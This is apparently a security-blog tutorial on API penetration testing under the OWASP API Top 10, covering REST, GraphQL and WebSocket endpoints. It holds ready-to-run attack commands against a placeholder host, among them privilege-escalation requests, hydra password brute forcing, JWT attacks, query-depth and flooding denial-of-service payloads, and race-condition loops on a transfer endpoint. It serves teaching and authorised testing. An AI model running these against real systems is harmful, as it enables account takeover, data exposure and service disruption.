Back to Blog

Modern API Security Testing: OWASP API Top 10

Comprehensive guide to API penetration testing covering REST, GraphQL, and WebSocket APIs. Learn to identify and exploit API vulnerabilities effectively.

Posted by

The Critical Importance of API Security

APIs are the backbone of modern applications, but they're often the most overlooked attack surface. With the rise of microservices and mobile applications, API security testing has become essential for any comprehensive penetration test.

API Discovery and Reconnaissance

The first step is discovering APIs that may not be documented or publicly known:

# Subdomain enumeration for API endpoints
subfinder -d target.com | grep -E "(api|dev|test|staging)" | httpx

# Directory brute forcing for API paths
gobuster dir -u https://target.com -w /usr/share/wordlists/api-paths.txt -x json,xml

# Check common API patterns
curl -s https://target.com/api/v1/
curl -s https://target.com/api/v2/
curl -s https://target.com/rest/
curl -s https://target.com/graphql

# JavaScript file analysis for API endpoints
cat target.js | grep -oE "https?://[^/]+/[^"']+" | grep api

# Swagger/OpenAPI documentation discovery
curl -s https://target.com/swagger.json
curl -s https://target.com/api-docs
curl -s https://target.com/docs

OWASP API Top 10 Testing

Systematic testing for the most critical API security risks:

API1: Broken Object Level Authorization

# Test object references manipulation
curl -H "Authorization: Bearer USER1_TOKEN" https://api.target.com/users/1
curl -H "Authorization: Bearer USER1_TOKEN" https://api.target.com/users/2

# Try different HTTP methods
curl -X DELETE -H "Authorization: Bearer TOKEN" https://api.target.com/users/2
curl -X PUT -H "Authorization: Bearer TOKEN" https://api.target.com/users/2 -d '{"role":"admin"}'

API2: Broken User Authentication

# JWT token analysis
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | jwt decode

# Test for weak JWT signatures
python3 jwt_tool.py -t https://api.target.com/protected -rh "Authorization: Bearer TOKEN"

# Password brute forcing
hydra -l admin -P passwords.txt api.target.com http-post-form "/auth:username=^USER^&password=^PASS^:401"

API3: Excessive Data Exposure

# Check for sensitive data in responses
curl -s https://api.target.com/users | jq . | grep -E "(password|ssn|credit)"

# Test different API versions
curl -s https://api.target.com/v1/users/1
curl -s https://api.target.com/v2/users/1

# Verbose parameter testing
curl -s "https://api.target.com/users?verbose=true&debug=1&full=1"

GraphQL Security Testing

GraphQL APIs require specialized testing approaches:

# Introspection query for schema discovery
{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
        }
      }
    }
  }
}

# Query depth attack (DoS)
{
  user {
    posts {
      comments {
        author {
          posts {
            comments {
              author {
                name
              }
            }
          }
        }
      }
    }
  }
}

# Alias-based query complexity attack
{
  user1: user(id: 1) { name }
  user2: user(id: 2) { name }
  user3: user(id: 3) { name }
  # ... repeat for hundreds of aliases
}

# Authorization bypass testing
{
  user(id: 1) {
    name
    email
    adminData  # Should this be accessible?
  }
}

REST API Advanced Testing

Beyond basic OWASP testing, consider these advanced REST API attack vectors:

# HTTP method tampering
curl -X GET https://api.target.com/admin/users
curl -X POST https://api.target.com/admin/users -d '{}'
curl -X PUT https://api.target.com/admin/users/1 -d '{"role":"admin"}'

# Parameter pollution
curl "https://api.target.com/users?id=1&id=2"
curl "https://api.target.com/users?id[]=1&id[]=2"

# Content-Type manipulation
curl -X POST -H "Content-Type: application/json" -d '{"role":"admin"}' https://api.target.com/users/1
curl -X POST -H "Content-Type: application/xml" -d '<user><role>admin</role></user>' https://api.target.com/users/1

# Race condition testing
for i in {1..50}; do
  curl -X POST -H "Authorization: Bearer TOKEN" -d '{"amount":100}' https://api.target.com/transfer &
done

WebSocket API Testing

Real-time applications using WebSockets introduce unique attack vectors:

# WebSocket connection testing
wscat -c wss://api.target.com/socket

# Message injection
{"type": "admin_command", "command": "delete_user", "target": "victim"}

# Authentication bypass
{"type": "auth", "token": "invalid_token"}
{"type": "admin_action", "action": "promote_user"}

# DoS through message flooding
while true; do echo '{"type":"spam"}' | wscat -c wss://api.target.com/socket; done

Automated API Testing Tools

Leverage specialized tools for comprehensive API security testing:

# OWASP ZAP API testing
zap-api-scan.py -t https://api.target.com/openapi.json

# Burp Suite extensions
# - API Scanner
# - GraphQL Raider
# - JSON Web Tokens

# Postman security testing
newman run api-security-tests.json --env production.json

# Custom Python script for API fuzzing
import requests
for payload in payloads:
    response = requests.post(f"https://api.target.com/endpoint", 
                           json={"param": payload},
                           headers={"Authorization": f"Bearer {token}"})
    analyze_response(response)

Business Logic Testing in APIs

API business logic flaws often provide the most critical vulnerabilities:

  • Rate limiting bypass: Use multiple API keys or distributed requests
  • Price manipulation: Modify product prices in API calls
  • Workflow bypass: Skip payment or verification steps
  • Privilege escalation: Modify role or permission parameters
  • Data exfiltration: Access resources through pagination abuse

API Security Best Practices

Defend against API attacks with these security measures:

  • Implement proper authentication and authorization on all endpoints
  • Use rate limiting and request throttling
  • Validate and sanitize all input data
  • Implement comprehensive logging and monitoring
  • Use tools like HackFast to continuously monitor and test your API security posture